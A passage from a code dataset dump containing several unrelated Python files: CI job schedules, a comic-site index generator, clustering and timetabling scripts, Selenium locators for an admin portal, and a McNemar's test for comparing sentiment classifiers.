\"clear\"\n sched.failure.keep_resources = True\n sched.conditions.retries = 1\n sched.conditions.frequency = \"wait_last_run 20\"\n sched.conditions.noncurrent = [ \"test\", \"build\", \"stop_vm\" ]\n sched.automation_phase = \"continuous_delivery\"\n sched.human_description = \"Insert commit info into run\"\n sched.on_success = [ \"test\" ]\n self.add_schedule()\n\n sched = self.new_schedule()\n sched.job = \"test\"\n sched.archive.timeout = 1800\n sched.archive.timewait = 180\n sched.archive.cleanup.instance = \"clear\"\n sched.failure.keep_resources = True\n sched.conditions.frequency = \"wait_last_run 60\"\n\n # Cannot have concurrency with a single docker host\n # The belows says another unit_test cannot run\n # while build is running b/c they run on the \n # same dockerhost. This can change with a more sophisicated\n # stack. This will also prevent a bunch of builds from completing\n # b/c of a race conditions. It's not a big deal because \n # the \"runs\" don't complete as it waits to stop the server, but\n # the unit_test and register of docker has completed.\n\n sched.conditions.noncurrent = [ \"build\", \"stop_vm\" ]\n sched.automation_phase = \"continuous_delivery\"\n sched.human_description = \"Running unit_test for code\"\n sched.on_success = [ \"build\" ]\n sched.on_failure = [ \"stop_vm\" ]\n self.add_schedule()\n \n sched = self.new_schedule()\n sched.job = \"build\"\n sched.archive.timeout = 1800\n sched.archive.timewait = 180\n sched.archive.cleanup.instance = \"clear\"\n sched.failure.keep_resources = True\n sched.conditions.noncurrent = [ \"test\", \"stop_vm\" ]\n sched.conditions.frequency = \"wait_last_run 60\"\n sched.automation_phase = \"continuous_delivery\"\n sched.human_description = \"Building docker container with code\"\n sched.on_success = [ \"stop_vm\" ]\n sched.on_failure = [ \"stop_vm\" ]\n self.add_schedule()\n\n sched = self.new_schedule()\n sched.job = \"stop_vm\"\n sched.archive.timeout = 300\n sched.archive.timewait = 10\n sched.archive.cleanup.instance = \"clear\"\n sched.failure.keep_resources = True\n sched.conditions.noncurrent = [ \"test\", \"build\" ]\n sched.conditions.frequency = \"wait_last_run 10\"\n sched.automation_phase = \"continuous_delivery\"\n sched.human_description = \"Stopping docker host\"\n self.add_schedule()\n\n return self.get_schedules()\n","sub_path":"stacks/_ed_configs/ec2_ci/_main/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":10288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"312717610","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.8 (3413)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/springheel/genmultipleindex.py\n# Compiled at: 2019-12-29 18:53:39\n# Size of source mod 2**32: 2921 bytes\nimport os\nfrom slugify import slugify, slugify_url\nsep = '\\n'\n\ndef genMultipleIndex(comics, characters_page, translated_strings):\n \"\"\"\n Generate an index page for a site with multiple comics.\n\n Parameters\n ----------\n comics : list\n A list of the Comics on the site.\n characters_page : bool\n Whether or not to add character-page links.\n translated_strings : dict\n The translation file contents for this site.\n \"\"\"\n elements = []\n dopen = '<div class=\"intro\">'\n dclose = '</div>'\n golatest_s = translated_strings['golatest_s']\n gofirst_s = translated_strings['gofirst_s']\n if characters_page == True:\n character_s = translated_strings['char_s']\n ltemplate = ['<h2>{category}</h2>', '<img src=\"{header}\" alt=\"{category}\" />',\n '<p class=\"author\">by {author}</p>', '<p class=\"desc\">{desc} (<span class=\"status\">{status}</span>)</p>',\n '<p>{golatest} | {gofirst}</p>']\n maintemplate = sep.join(ltemplate)\n for i in comics:\n golatest = [\n '<a href=\"', i.lbp_link, '\">', golatest_s, '</a>']\n golatest = ''.join(golatest)\n gofirst = ['<a href=\"', i.fbp_link, '\">', gofirst_s, '</a>']\n gofirst = ''.join(gofirst)\n elements.append(dopen)\n div = maintemplate.format(header=(i.header), category=(i.category_escaped),\n author=(i.author),\n desc=(i.desc),\n status=(i.statuss),\n golatest=golatest,\n gofirst=gofirst)\n elements.append(div)\n if characters_page == True:\n if i.chars_file != 'None':\n if i.chars_file != 'False':\n cat_slug = slugify_url(i.category)\n characters_link = ''.join([cat_slug, '-', 'characters.html'])\n char_line = '<p><a href=\"{characters_link}\">{character_s}</a></p>'.format(characters_link=characters_link, character_s=character_s)\n elements.append(char_line)\n elements.append(dclose)\n else:\n return elements","sub_path":"pycfiles/springheel-5.2.4-py3.8/genmultipleindex.cpython-38.py","file_name":"genmultipleindex.cpython-38.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"457106757","text":"from flask import Blueprint,Flask,render_template,redirect,url_for,request,flash,session,logging\n\nlogout_b = Blueprint('logout', __name__)\n\n\n#Logout islemi \n@logout_b.route('/logout')\ndef logout():\n session.clear()\n return redirect(url_for('log_reg.login'))","sub_path":"views/logout.py","file_name":"logout.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"56400169","text":"import numpy as np\nimport random\nfrom IState import IState\nfrom sklearn.utils import shuffle\n\nclass Cluster(IState):\n def __init__(self, X, k, grupos = None,centroides = None):\n self.X = X\n self.grupos = grupos\n self.centroides = centroides\n self.k = k\n self.sse = 0\n if grupos is not None:\n self.GerarCentroide()\n else:\n self.GerarGrupos()\n\n def Shuffle(self):\n self.X, self.grupos = shuffle(self.X, self.grupos)\n self.GerarCentroide()\n\n def set_k(self,k):\n self.k = k\n\n def get_grupos(self):\n return np.arange(0,self.k)\n \n def set_grupos(self, grupos):\n self.grupos = grupos\n self.GerarCentroide()\n \n def GerarGrupos(self):\n length = len(self.X)\n repeat = int(length/self.k) + 1\n #self.grupos = np.random.randint(0,self.k,len(self.X))\n self.grupos = np.array([_ for _ in range(self.k)]*repeat)[:length]\n #print(self.grupos)\n \n self.GerarCentroide()\n\n def GerarCentroide(self):\n self.centroides = np.array([sum(self.X[self.grupos == g])/len(self.X[self.grupos == g]) for g in self.get_grupos()])\n self.SSE()\n\n \n ####### Distancia Euclidia ##########\n def SomaDistanciaEuclidia(self, X, centroide):\n return sum([np.linalg.norm(x-centroide) for x in X])\n\n def SSE(self):\n self.sse = sum([self.SomaDistanciaEuclidia(self.X[self.grupos == g],self.centroides[g]) for g in self.get_grupos()])\n return self.sse\n\n def Show(self):\n print('Grupos:', self.grupos)\n print('Centroides:', self.centroides)\n print('Pontos:', self.X)\n\n ##### IState ######\n def Value(self):\n return self.sse\n\n def NextState(self):\n return self.Mutation()\n\n #Compara se os grupos de dois clusters são iguais\n def Equal(self, other):\n return np.array_equal(self.grupos, other.grupos)\n\n #IMutable methods\n def Crossover(self,other):\n r = random.randint(0, len(self.grupos) - 1)\n son = np.concatenate((self.grupos[:r], other.grupos[r:]), axis=0)\n daug = np.concatenate((other.grupos[:r], self.grupos[r:]), axis=0)\n\n\n #Se o número de grupos for menor que K cancela esse cruzamento\n if(len(np.unique(son)) < self.k):\n son = self.grupos\n if(len(np.unique(daug)) < self.k):\n daug = other.grupos\n son, daug = Cluster(X = self.X, k = self.k, grupos=son), Cluster(X = self.X, k = self.k, grupos=daug)\n\n\n\n return son, daug\n \n def get_number_states(self):\n return self.k\n \n def ChangeState(self, index, value):\n new_grupos = self.grupos.copy()\n\n old_value = new_grupos[index]\n new_value = old_value + value\n\n if(new_value < 0):\n new_grupos[index] = self.k-1\n elif new_value >= self.k:\n new_grupos[index] = 0\n else:\n new_grupos[index] = new_value\n \n #Verifica se continua com K grupos\n if len(np.unique(new_grupos)) < self.k:\n new_grupos[index] = old_value #Volta so estado anterior, mantendo K grupos\n\n return Cluster(\n X = self.X, \n k = self.k, \n grupos = new_grupos\n )\n\n\n def Mutation(self):\n new_grupos = self.grupos.copy()\n\n if(self.k > 1):#Se tiver só um grupo, não precisa fazer mutação\n index = random.randint(0, len(new_grupos)-1)\n while new_grupos[index] == self.grupos[index] or len(np.unique(new_grupos)) < self.k:\n index = random.randint(0, len(new_grupos)-1)\n new_grupos[index] = random.randint(0, self.k - 1)\n \n return Cluster(\n X = self.X, \n k = self.k, \n grupos = new_grupos\n ) \n","sub_path":"trab2/code/Cluster.py","file_name":"Cluster.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"70896407","text":"import requests\n\n\nclass RequestHandler:\n\n def __init__(self):\n self.session = requests.Session()\n\n def visit(self, url, method, params=None, data=None, json=None, **kwargs):\n res = self.session.request(url, method, params=params, data=data, json=json, **kwargs)\n try:\n return res.json()\n except ValueError:\n print(\"not json\")\n","sub_path":"python 25 code/class19_20200102_excel_ddt/common/request_handler.py","file_name":"request_handler.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"126119409","text":"#!/usr/bin/env python\r\n# -*- coding:utf-8 -*-\r\n# Author: leeyoshinari\r\nimport os\r\nimport json\r\nimport queue\r\nfrom concurrent.futures import ThreadPoolExecutor\r\nfrom testing import Testing\r\nfrom logger import logger, cfg\r\n\r\n\r\nclass Scheduler(object):\r\n def __init__(self):\r\n self.testing = Testing()\r\n self.thread_pool_size = max(1, int(cfg.getConfig('thread_pool')))\r\n self.test_task = queue.Queue() # 创建队列\r\n self.executor = ThreadPoolExecutor(self.thread_pool_size) # 创建线程池\r\n\r\n self.run()\r\n\r\n @property\r\n def task(self):\r\n return None\r\n\r\n @task.setter\r\n def task(self, value):\r\n self.test_task.put((self.testing.run, value))\r\n\r\n def worker(self):\r\n \"\"\"\r\n 从队列中获取测试任务,并开始执行\r\n :return: \r\n \"\"\"\r\n while True:\r\n func, param = self.test_task.get()\r\n func(param)\r\n self.test_task.task_done()\r\n\r\n def run(self):\r\n \"\"\"\r\n 启动线程池执行测试任务\r\n :return:\r\n \"\"\"\r\n for i in range(self.thread_pool_size):\r\n self.executor.submit(self.worker)\r\n\r\n\r\ndef replace_email(src, new_dict, dst):\r\n old_dict = json.load(open(src, 'r', encoding='utf-8'))\r\n for k, v in new_dict.items():\r\n old_dict.update({k: v})\r\n\r\n with open(dst, 'w', encoding='utf-8') as f:\r\n f.write(json.dumps(old_dict))\r\n\r\n\r\ndef replace_config(src, new_dict, dst):\r\n old_dict = {}\r\n with open(src, 'r', encoding='utf-8') as f:\r\n lines = f.readlines()\r\n\r\n for line in lines:\r\n k_v = line.split('//')[0].split('=')\r\n old_dict.update({k_v[0].strip(): k_v[1].strip()})\r\n\r\n for k, v in new_dict.items():\r\n old_dict.update({k: v})\r\n\r\n lines = [f'{k}={v}\\n' for k, v in old_dict.items()]\r\n with open(dst, 'w', encoding='utf-8') as f:\r\n f.writelines(lines)\r\n","sub_path":"schedule.py","file_name":"schedule.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"299040275","text":"import random\nimport json\n\ndef gen_except(resources, courses):\n\tresult = dict()\n\tcheck = list()\n\tfor i in range(resources - 1):\n\t\tresult[i] = list()\n\t\tc = random.randint(1, courses)\n\t\tindex = random.randint(0, courses - c)\n\t\tfor j in range(c):\n\t\t\tif index not in check:\n\t\t\t\tcheck.append(index)\n\t\t\tresult[i].append(index)\n\t\t\tindex = random.randint(index + 1, courses - (c - j - 1))\n\tresult[resources - 1] = list()\n\tfor i in range(courses):\n\t\tif i not in check:\n\t\t\tresult[resources - 1].append(j)\n\texcept_result = dict()\n\tfor i in result:\n\t\texcept_result[i] = list()\n\t\tfor j in range(courses):\n\t\t\tif j not in result[i]:\n\t\t\t\texcept_result[i].append(j)\n\tf = open('gen.txt', 'w')\n\tf.write(json.dumps(result))\n\treturn except_result\n\ndef gen():\n\tf = open('gen.mod', 'a')\n\tf.write('set I;\\n/* set of courses */\\nset J;\\n/* set of rooms */\\nset T;\\n/* set of teachers */\\nset K;\\n/* set of time slots */\\n')\n\n\tcourses = 24\n\trooms = 30\n\tteachers = 15\n\ttimeslots = 5\n\n\tt_excepted = gen_except(teachers, courses)\n\tr_excepted = gen_except(rooms, courses)\n\n\tfor i in range(rooms):\n\t\tif len(r_excepted[i]) > 0:\n\t\t\tf.write('set R' + str(i) + ';\\n/* room ' + str(i) + ' */\\nset ER' + str(i) + ';\\n/* exception courses for room ' + str(i) + ' */\\n')\n\tfor i in range(teachers):\n\t\tif len(t_excepted[i]) > 0:\n\t\t\tf.write('set T' + str(i) + ';\\n/* teacher ' + str(i) + ' */\\nset ET' + str(i) + ';\\n/* exception courses for teacher ' + str(i) + ' */\\n')\n\t\n\tf.write('param cost{i in I, j in J, t in T, k in K}, >= 0;\\n/* cost of allocating room j to course i with teacher t in time slot k */\\n\\nvar x{i in I, j in J, t in T, k in K} binary;\\n/* x[i,j,t,k] = 1 means room j is assigned to course i with teacher t in time slot k\\nx[i,j,t,k] = 0 otherwise */\\n\\ns.t. first{i in I}: sum{j in J, t in T, k in K} x[i,j,t,k] = 1;\\n\\ns.t. second{j in J, k in K}: sum{i in I, t in T} x[i,j,t,k] <= 1;\\n\\ns.t. third{t in T, k in K}: sum{i in I, j in J} x[i,j,t,k] <= 1;\\n\\n')\n\n\tfor i in range(rooms):\n\t\tif len(r_excepted[i]) > 0:\n\t\t\tf.write('s.t. cr' + str(i) + ': sum{i in ER' + str(i) + ', j in R' + str(i) + ', t in T, k in K} x[i,j,t,k] = 0;\\n\\n')\n\tfor i in range(teachers):\n\t\tif len(t_excepted[i]) > 0:\n\t\t\tf.write('s.t. ct' + str(i) + ': sum{i in ET' + str(i) + ', j in T' + str(i) + ', t in T, k in K} x[i,j,t,k] = 0;\\n\\n')\n\n\tf.write('minimize obj: sum{i in I, j in J, t in T, k in K} cost[i,j,t,k] * x[i,j,t,k];\\n/* the objective is to find a cheapest assignment */\\n\\nsolve;\\n\\n')\n\t\n\tf.write('printf {i in I, j in J, t in T, k in K: x[i,j,t,k] = 1} \\'result: %s\\\\n\\', k;\\n\\n')\n\n\tf.write('data;\\n\\n')\n\n\tf.write('set I :=')\n\tfor i in range(courses):\n\t\tf.write(' ' + str(i))\n\tf.write(';\\n\\n')\n\n\tf.write('set T :=')\n\tfor i in range(teachers):\n\t\tf.write(' ' + str(i))\n\tf.write(';\\n')\n\n\tf.write('set J :=')\n\tfor i in range(rooms):\n\t\tf.write(' ' + str(i))\n\tf.write(';\\n')\n\n\tf.write('set K :=')\n\tfor i in range(timeslots):\n\t\tf.write(' ' + str(i))\n\tf.write(';\\n')\n\n\tfor i in range(teachers):\n\t\tif len(t_excepted[i]) > 0:\n\t\t\tf.write('set T' + str(i) + ' := ' + str(i) + ';\\nset ET' + str(i) + ' :=')\n\t\t\tfor j in t_excepted[i]:\n\t\t\t\tf.write(' ' + str(j))\n\t\t\tf.write(';\\n\\n')\n\tfor i in range(rooms):\n\t\tif len(r_excepted[i]) > 0:\n\t\t\tf.write('set R' + str(i) + ' := ' + str(i) + ';\\nset ER' + str(i) + ' :=')\n\t\t\tfor j in r_excepted[i]:\n\t\t\t\tf.write(' ' + str(j))\n\t\t\tf.write(';\\n\\n')\n\n\tf.write('param cost :=\\n')\n\n\tfor k in range(timeslots):\n\t\tfor t in range(teachers):\n\t\t\tf.write('[*,*,' + str(t) + ',' + str(k) + ']:')\n\t\t\tfor r in range(rooms):\n\t\t\t\tf.write(' ' + str(r))\n\t\t\tf.write(' :=\\n')\n\t\t\tfor i in range(courses):\n\t\t\t\tf.write(str(i))\n\t\t\t\tfor r in range(rooms):\n\t\t\t\t\tf.write(' ' + str(k + 1))\n\t\t\t\tf.write('\\n')\n\tf.write(';\\nend;')\t\t\t\n\ngen()\n","sub_path":"gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"10965741","text":"__author__ = 'dboyko'\n\nclass my_credentials():\n\n def login_var(self):\n return {\n #\"tms_url\": \"http://172.16.10.145:8080/login.jsp\", # \"http://172.16.10.65:8080/login.jsp\", # \"http://172.16.10.146:8080/login.jsp\"\n #\"baseurl\": \"https://admin.readytech.com\", # \"http://172.16.10.65:8080/AdminPortal/\", # \"http://172.16.10.146:8080/AdminPortal\",\n \"tms_146\": \"http://172.16.10.146:8080/login.jsp\",\n \"tms_url\": \"http://172.16.10.65:8080/login.jsp\",\n \"baseurl\": \"http://172.16.10.65:8080/AdminPortal/\",\n\n \"customername\": \"ReadyTech\",\n \"username\": \"dclienttester\",\n \"username_acceptTest\": \"TestNewUser\",\n \"password\": \"q2w3edc\",\n \"tablexPath\": \".//*[@id='j_idt137']/tbody/tr\"}\n\n def tabs(self):\n return {\n \"events\": \"Events\",\n \"access\": \"Access\",\n \"images\": \"Images\",\n \"users\": \"Users\",\n \"deployments\": \"Deployments\",\n \"deployments_plan\": \"Deployment Plans\",\n \"templates\": \"Templates\",\n 'vouchers': \"Vouchers\",\n 'platforms': \"Platforms\",\n }\n\n def sub_buttons(self):\n return{\n \"events_list\": \"List\",\n \"events_detail\": \"Detail\",\n \"events_access\": \"Access\",\n \"events_labs\": \"Labs\",\n \"events_notification\": \"Notifications\",\n \"deployments\": \"Deployments\",\n \"history\": \"History\",\n \"platform\": \"Platforms\",\n \"spla\": \"SPLA\",\n \"cache\": \"Cache\",\n \"image_notes\": \"Image Notes\",\n\n # Deployments tab: xpath's\n 'depl_list': \"//div[5]/li//li/a\",\n \"depl_channels\": \"//div[5]/li//li[2]/a\", # \"Channels\",\n \"depl_channel_scripts\": \"//div[5]/li//li[3]/a\", # \"Channel Scripts\",\n \"depl_user_actions\": \"//div[5]/li//li[4]/a\", # \"User Actions\",\n \"depl_scripts\": \"//div[5]/li//li[5]/a\", # \"Scripts\",\n \"depl_events\": \"//div[5]/li//li[6]/a\", # \"events\": \"Events\",\n \"depl_templates_sub\": \"//div[5]/li//li[7]/a\", # \"templates_sub\": \"Templates\",\n 'depl_history': \"//div[5]/li//li[8]/a\",\n\n # Deployment Plans tab: xpath's\n 'depl_plans_list': \"//div[6]/li/ul/li/a\",\n 'depl_plans_deployments': \"//div[6]/li/ul/li[2]/a\",\n 'depl_plans_utilization': \"//div[6]/li/ul/li[3]/a\",\n 'depl_plans_script': \"//div[6]/li/ul/li[4]/a\",\n 'depl_plans_templates': \"//div[6]/li/ul/li[5]/a\",\n\n #\"deployments_deplPlan\": \"//div[@id='deploymentplan']/li/ul/li[2]/a\",\n #\"utilization\": \"Utilization\",\n #\"scripts_deplPlan\": \"//div[@id='deploymentplan']/li/ul/li[4]/a\",\n #\"templates\": \"Templates\",\n \n # Templates tab: xpath's\n 'list': \"//div[7]/li/ul/li/a\",\n 'detail': \"//div[7]/li/ul/li[2]/a\",\n 'utilization': \"//div[7]/li/ul/li[3]/a\",\n 'content': \"//div[7]/li/ul/li[4]/a\",\n 'vouchers': \"//div[7]/li/ul/li[5]/a\",\n 'extensions': \"//div[7]/li/ul/li[6]/a\",\n 'notifications': \"//div[7]/li/ul/li[7]/a\",\n 'rules': \"//div[7]/li/ul/li[8]/a\",\n 'security': \"//div[7]/li/ul/li[9]/a\",\n 'history': \"//div[7]/li/ul/li[10]/a\",\n\n # Vouchers tab: xpath\n 'voucher_list': \"//div[8]/li//li/a\",\n 'voucher_detail': \"//div[8]/li//li[2]/a\",\n 'voucher_notification': \"//div[8]/li//li[3]/a\",\n\n # Platforms\n 'platforms_list': \"//div[10]/li//li/a\",\n 'platforms_systems': \"//div[10]/li//li[2]/a\",\n 'platforms_actions': \"//div[10]/li//li[3]/a\",\n }\n\n def buttons(self):\n return{\n \"search_icon\": \"//div[3]/input\",\n \"delete_icon\": \"//td[7]/a/img\",\n \"event_newEvent\": \"New Event\",\n \"event_saveButton\": \"//form/div[3]/input\",\n \"event_edit\": \"Edit\",\n # Access\n \"event_accessButton\": \"Access\",\n \"addAccess_button\": \"_save_add_access\",\n # Cancel Access Code\n \"event_select_accessCode\": \"//tr[4]/td/input\",\n \"event_CancelCode_button\": \"_save_cancel_access\",\n # Delete Access Code\n \"event_select_accessCode2\": \"//tr[3]/td/input\",\n \"event_DeleteCode_button\": \"//tr[3]/td[16]/a/img\",\n # Delete Event\n \"event_delete_button\": \"Delete\",\n # Search\n \"event_search\": \"//div[5]/input\",\n # Delete Event from table\n \"SPevent_list_delete\": \"//td[16]/a/img\",\n \"event_edit2Save\": \"save_event_top\",\n\n # Users / New User button\n \"tms_new_user_button\": \"New User\",\n \"tms_users_roles\": \"Roles\",\n # \"tms_new_user_edit\": \"Edit\",\n\n # Images / New Software Image\n \"tms_new_software_image\": \"New SoftwareImage\",\n \"image_save_button\": \"save_softwareimage_bottom\",\n \"image_edit_button\": \"Edit\",\n \"image_delete_button\": \"Delete\",\n\n # Deployments\n \"tms_new_deployment\": \"New Deployment\",\n \"tms_deployment_duplicate\": \"Duplicate\",\n \"deployment_save_button\": \"save_deployment_top\",\n \"deployment_edit_button\": \"Edit\",\n \"deployment_delete_button\": \"Delete\",\n \"deployment_new_channel_button\": \"New Channel\",\n \"deployment_save_new_channel\": \"saveDeploymentChannel_button_save\",\n\n #Deployment Plans\n \"tms_new_deployment_plan_button\": \"New Deployment Plan\",\n \"edit\": \"Edit\",\n \"new_deployment_button\": \"New Deployment\",\n \"save_deploymentplan__button\": \"save_deploymentplan_bottom\",\n \"PlannedDeployment_button_save\": \"savePlannedDeployment_button_save\",\n\n # Templates\n \"tms_new_template\": \"New Template\",\n \"tms_template_type_dropdown\": \"templateType\",\n \"tms_template_full_title\": \"saveTemplate_template_fullTitle\",\n \"tms_template_short_title\": \"saveTemplate_template_shortTitle\",\n \"tms_template_catalog_num\": \"saveTemplate_template_catalogNum\",\n \"tms_template_status_dropdown\": \"saveTemplate_template_releaseStatusKey\",\n \"tms_template_discription_link\": \"saveTemplate_template_externalLink\",\n \"tms_template_deployment_type_dropdown\": \"deployType\",\n \"tms_template_deployment_dropdown\": \"deploymentId\",\n \"tms_template_plan_dropdown0\": \"deploymentPlanId\",\n \"tms_template_note\": \"note\",\n \"tms_template_save_button\": \"saveTemplate_button_save\",\n \"tms_template_edit_button\": \"Edit\",\n \"tms_template_delete_button\": \"Delete\",\n\n # Voucher\n 'tms_voucher_newVoucher': \"New VoucherBlock\",\n 'tms_voucher_save_button': \"saveVoucherBlock_button_save\", # \"//div[2]/div/input\", # id: saveVoucherBlock_button_save\n 'tms_voucher_edit_button': \"//a[3]\",\n 'tms_voucher_delete_button': \"//a[4]\",\n\n # Platforms\n 'tms_platforms_newPlatform_button': \"//div[2]/div/a\",\n 'tms_platform_save_button': \"saveSystemPlatform_button_save\",\n 'tms_platform_edit_button': \"//div[2]/a\",\n 'tms_platform_delete_button': \"//a[2]\",\n }\n\n def ui_fields(self):\n return {\n # Basic Information\n \"tms_eventS_customer_drop_down\": \"customerId\", # Events/List/Events-Filters\n \"tms_event_customer_drop_down\": \"customerId\", # ReadyTech\n \"tms_event_billing_drop_down\": \"billingRegionId\", # -- All billing Entities --\n \"tms_event_eventType_drop_down\": \"eventTypeId\", # -- All Types --\n \"tms_event_choice_drop_down\": \"eventChoiceId\", # All Events\n \"tms_search_textbox\": \"searchName\",\n #\"tms_events_timezone_drop_down\": \"event.timezoneKey\",\n\n # Image\n \"tms_image_Lname\": \"saveSoftwareImage_image_longName\",\n \"tms_image_Sname\": \"saveSoftwareImage_image_shortName\",\n \"tms_image_Fname\": \"saveSoftwareImage_image_folderName\",\n \"images_AdminName\": \"saveSoftwareImage_image_adminUsername\",\n \"images_AdminPassword\": \"saveSoftwareImage_image_adminPassword\",\n \"images_StudentName\": \"saveSoftwareImage_image_studentUsername\",\n \"images_StudentPassword\": \"saveSoftwareImage_image_studentPassword\",\n \"images_InstructorName\": \"saveSoftwareImage_image_instructorUsername\",\n \"images_InstructorPassword\": \"saveSoftwareImage_image_instructorPassword\",\n \"image_size_gb\": \"saveSoftwareImage_image_sizeGb\",\n \"image_notes\": \"saveSoftwareImage_image_notes\",\n \"image_capture_note\": \"saveSoftwareImage_image_captureNote\",\n \"image_virtual_size_gb\": \"saveSoftwareImage_image_virtualSizeGb\",\n\n # Users / New User\n \"tms_new_user_username\": \"saveUser_username\",\n \"tms_new_user_password\": \"saveUser_user_password\",\n \"tms_new_user_password_confirm\": \"saveUser_user_confirmPassword\",\n \"tms_new_user_Fname\": \"saveUser_user_firstName\",\n \"tms_new_user_Lname\": \"saveUser_user_lastName\",\n \"tms_new_user_Pemail\": \"saveUser_primaryEmail\",\n \"tms_new_user_Alt_email\": \"saveUser_user_altEmail\",\n \"tms_new_user_roles\": \"moveAllRight1\",\n \"tms_new_user_save_button\": \"saveUser_button_save\",\n \"enabled\": \"user.accountEnabled\",\n\n # Resources (Self-Paced)\n \"tms_SPevent_Student_Fname\": \"saveEvent_event_studentFname\",\n \"tms_SPevent_Student_Lname\": \"saveEvent_event_studentLname\",\n \"tms_SPevent_Student_Email\": \"studentEmail\",\n\n\n \"event_owner\": \"ownerId\",\n \"event_name\": \"eventName\",\n \"event_startDate\": \"startDate\",\n \"event_endDate\": \"endDate\",\n \"event_timezone\": \"timezone\",\n \"event_confirmation_status\": \"saveEvent_event_confirmationStatusKey\",\n # Template Materials\n \"event_startingTemplate\": \"templateId\",\n \"event_provideAccess\": \"event.materialsAccess\",\n # Labs\n \"event_request_usears\": \"totalAccess\",\n \"event_deploymentType\": \"deployTypeKey\",\n \"event_deployment\": \"deploymentId\",\n \"event_assigned_DC\": \"datacenterId\",\n\n # Deployment\n \"deployment_name\": \"saveDeployment_deployment_name\",\n\n #Deployment Plans\n \"DeploymentPlan__name\": \"saveDeploymentPlan_deploymentPlan_name\",\n\n # Vouchers\n 'tms_voucher_size_of_block': \"blockSize\", # id\n 'tms_voucher_note': \"saveVoucherBlock_voucherBlock_billingAdjNote\", # id\n\n # Platforms\n 'tms_platforms_name': \"saveSystemPlatform_systemPlatform_name\",\n 'tms_platforms_memory': \"saveSystemPlatform_systemPlatform_memoryGb\",\n 'tms_platforms_disk': \"saveSystemPlatform_systemPlatform_diskGb\",\n 'tms_platforms_cpu_type': \"saveSystemPlatform_systemPlatform_cpuTypeKey\",\n 'tms_platforms_assignable_flag': \"systemPlatform.assignableFlag\",\n 'tms_platforms_fixed_schedule_flag': \"systemPlatform.fixedSchedFlag\",\n 'tms_platforms_auto_power_off': \"systemPlatform.autoPoweroff\",\n\n\n #\n\n\n }\n\n def estimation(self):\n return{\n # ilt_classroom for 3 users, 1 day\n \"ilt_estimation\": \"estimated_price\",\n }","sub_path":"TMS_PY/Local_scripts_TMS_PY/platforms/tms_elements.py","file_name":"tms_elements.py","file_ext":"py","file_size_in_byte":11651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"413309553","text":"def sequential_search(data, key) :\r\n found = False\r\n index = 0\r\n while ( not found and index < len(data) ):\r\n if ( key == data[index] ):\r\n found = True\r\n else:\r\n index = index + 1\r\n if ( not found):\r\n index = -1\r\n return index\r\n\r\n\r\ndef test():\r\n import time,random\r\n from binary_search import binary_search\r\n seq = []\r\n for i in range(1000):\r\n seq.append(i)\r\n \r\n a=random.randint(1,1000)\r\n c=time.time()\r\n sequential_search(seq,a)\r\n print(\"seq, %s\",time.time()-c)\r\n \r\n c=time.time()\r\n binary_search(seq,a)\r\n print(\"seq, %s\",time.time()-c)\r\n\r\n\r\ntest()\r\n\r\n","sub_path":"LAB8/sequential_search.py","file_name":"sequential_search.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"428625403","text":"'''\ncode for mcnemar's test\n\nSpecify the method name and dataset name in the command line argument.\nFor example, if you want to do mcnemar's test for the result of SEntiMoji and SEntiMoji-T\non Jira dataset, run:\npython Mtest.py -methodA=SEntiMoji -methodB=SEntiMoji-T -dataset=Jira\n'''\nimport argparse\nimport codecs\nfrom statsmodels.sandbox.stats.runs import mcnemar\n\n\ndef load_method_res(method, dataset):\n correct_set = set()\n incorrect_set = set()\n idx = 0\n\n for fold in range(0, 5):\n with codecs.open('../result/%s/fold%d/result_%s.txt' % (dataset, fold, method), 'r', 'utf-8') as f:\n for line in f:\n line = line.strip().split('\\t')\n # predict correct\n if line[1] == line[2]:\n correct_set.add(idx)\n\n # predict incorrect\n else:\n incorrect_set.add(idx)\n idx += 1\n\n res = {'method': method, 'dataset': dataset, 'length': idx,\n 'correct': correct_set, 'incorrect': incorrect_set}\n return res\n\n\ndef mcnemar_test(methodA_res, methodB_res):\n assert methodA_res['dataset'] == methodB_res['dataset']\n assert methodA_res['length'] == methodB_res['length']\n\n # calculate the contingency table for mcnemar's test\n #\t\t\t\t methodB\n # \t correct incorrect\n # methodA correct A B\n # incorrect C D\n\n A, B, C, D = 0, 0, 0, 0\n for idx in range(0, methodA_res['length']):\n if idx in methodA_res['correct'] and idx in methodB_res['correct']:\n A += 1\n if idx in methodA_res['correct'] and idx in methodB_res['incorrect']:\n B += 1\n if idx in methodA_res['incorrect'] and idx in methodB_res['correct']:\n C += 1\n if idx in methodA_res['incorrect'] and idx in methodB_res['incorrect']:\n D += 1\n table = [[A, B], [C, D]]\n\n test_result = mcnemar(table, exact=False, correction=True)\n return test_result\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-methodA', type=str, default='SEntiMoji', help='name of method A')\n parser.add_argument('-methodB', type=str, default='SEntiMoji-T', help='name of method B')\n parser.add_argument('-dataset', type=str, default='Jira', help='name of dataset')\n args = parser.parse_args()\n \n # parse argument\n methodA = args.methodA\n methodB = args.methodB\n dataset = args.dataset\n \n methodA_res = load_method_res(methodA, dataset)\n methodB_res = load_method_res(methodB, dataset)\n \n test_result = 